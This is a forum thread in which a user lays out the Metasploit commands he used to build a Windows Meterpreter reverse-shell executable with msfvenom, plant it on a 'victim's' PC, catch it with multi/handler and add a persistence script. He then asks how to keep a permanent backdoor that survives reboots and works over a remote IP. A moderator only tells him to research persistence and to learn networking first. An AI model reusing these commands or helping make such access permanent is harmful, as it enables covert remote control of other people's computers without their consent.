Author Topic: Msf/Multi/Handler/Meterpreter Question  (Read 1272 times)

0 Members and 2 Guests are viewing this topic.

Offline anometality

  • /dev/null
  • *
  • Posts: 5
  • Cookies: -1
    • View Profile
Msf/Multi/Handler/Meterpreter Question
« on: December 19, 2015, 05:28:01 pm »
Hello guys .I actually need some guidance on this.I got few questions that i believe you can answer them easily.So,after i use msf and making a payload with a reversal connection to my computer and i inject it to the victims pc,i wonder if its possible to leave a permanent backdoor there.I mean,every time after the exe has runned ,i try to reconnect with the same way and it just need the exe to run again in order to connect back.I managed to leave a backdoor but when i restart the "Victim's" computer it needs the exe to run again manually ! A quick show of what i did ...


msfvenom -p windows/meterpreter/reverse_tcp LHOST=myip LPORT=my port -f exe > Hey.exe

After that i run the console using the exploit multi/handler

use multi/handler
....set PAYLOAD windows/meterpreter/reverse_tcp

after that i am setting the payload!

and now,i run an AutoScript.....
set AutoRunScript persistence
....

set ExitOnSession false...

After i run this code,as i told you before it needs the exe to Run ... Ok just say i am in and got the connection is done...

meterpreter> Sessions
>Background
sessions (to see if its done)
sessions -i 1 for expample
background ....


If i do this,while the victim's computer is on i can easily backdoor,after he restarts,the connection needs the handler again...

So here is the question....

*Can i permanent set a payload (actually the RunScript already does) and try to enter after a reboot/shutdown or else?

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Msf/Multi/Handler/Meterpreter Question
« Reply #1 on: December 19, 2015, 06:31:38 pm »
This would fall under perstistance/backdoors , look it up.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline anometality

  • /dev/null
  • *
  • Posts: 5
  • Cookies: -1
    • View Profile
Re: Msf/Multi/Handler/Meterpreter Question
« Reply #2 on: December 19, 2015, 06:35:01 pm »
This would fall under perstistance/backdoors , look it up.

May i have a bit of explanation here?

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline anometality

  • /dev/null
  • *
  • Posts: 5
  • Cookies: -1
    • View Profile




Offline anometality

  • /dev/null
  • *
  • Posts: 5
  • Cookies: -1
    • View Profile
Re: Msf/Multi/Handler/Meterpreter Question
« Reply #8 on: December 20, 2015, 07:39:43 pm »
The same way can be done with the a Remote ip ? I mean setting up the RPORT/RHOST and doing the same things will be able to connect the computers together? (Cause all of this is for a local network)

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Msf/Multi/Handler/Meterpreter Question
« Reply #9 on: December 21, 2015, 12:41:52 am »
The same way can be done with the a Remote ip ? I mean setting up the RPORT/RHOST and doing the same things will be able to connect the computers together? (Cause all of this is for a local network)
I strongly suggest you stop right here and start learning about networking first, this is essential to understand and will prevent silly questions such as the above.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage